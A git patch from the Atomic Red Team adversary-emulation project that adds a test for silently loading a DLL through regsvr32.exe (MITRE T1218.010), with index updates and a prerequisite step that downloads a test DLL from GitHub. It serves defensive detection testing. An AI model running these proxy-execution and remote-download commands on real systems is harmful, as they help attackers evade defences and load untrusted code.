From e922799d431cef2d24691ee970bd6b84c0bb7838 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 9 Feb 2021 18:16:39 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 31 +++++++++++++ atomics/T1218.010/T1218.010.md | 46 +++++++++++++++++++ 6 files changed, 81 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e31635e2..466ec3ec 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -470,6 +470,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt +defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c1d95468..df92f2e3 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -276,6 +276,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt +defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2d4ae5e4..3a5c0299 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -862,6 +862,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - Atomic Test #4: Regsvr32 Registering Non DLL [windows] + - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #1: Masquerading as Windows LSASS process [windows] - Atomic Test #2: Masquerading as Linux crond process. [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 60726942..093a7787 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -498,6 +498,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - Atomic Test #4: Regsvr32 Registering Non DLL [windows] + - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #1: Masquerading as Windows LSASS process [windows] - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 579fd975..840fc4ae 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37850,6 +37850,37 @@ defense-evasion: elevation_required: false command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n" cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n" + - name: Regsvr32 Silent DLL Install Call DllRegisterServer + auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f + description: Regsvr32.exe is a command-line program used to register and unregister + OLE controls. Normally, an install is executed with /n to prevent calling + DllRegisterServer. + supported_platforms: + - windows + input_arguments: + dll_name: + description: Name of DLL to Install + type: String + default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll + regsvr32path: + description: Default location of Regsvr32.exe + type: String + default: C:\Windows\system32 + regsvr32name: + description: Default name of Regsvr32.exe + type: String + default: regsvr32.exe + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" + executor: + command: "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}" + name: command_prompt T1036.003: technique: external_references: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index 4bf31909..043c0a8c 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -16,6 +16,8 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe - [Atomic Test #4 - Regsvr32 Registering Non DLL](#atomic-test-4---regsvr32-registering-non-dll) +- [Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer](#atomic-test-5---regsvr32-silent-dll-install-call-dllregisterserver) +
@@ -183,4 +185,48 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}" +
+
+ +## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| +| regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{regsvr32path}\#{regsvr32name} /s /i #{dll_name} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{dll_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" +``` + + + +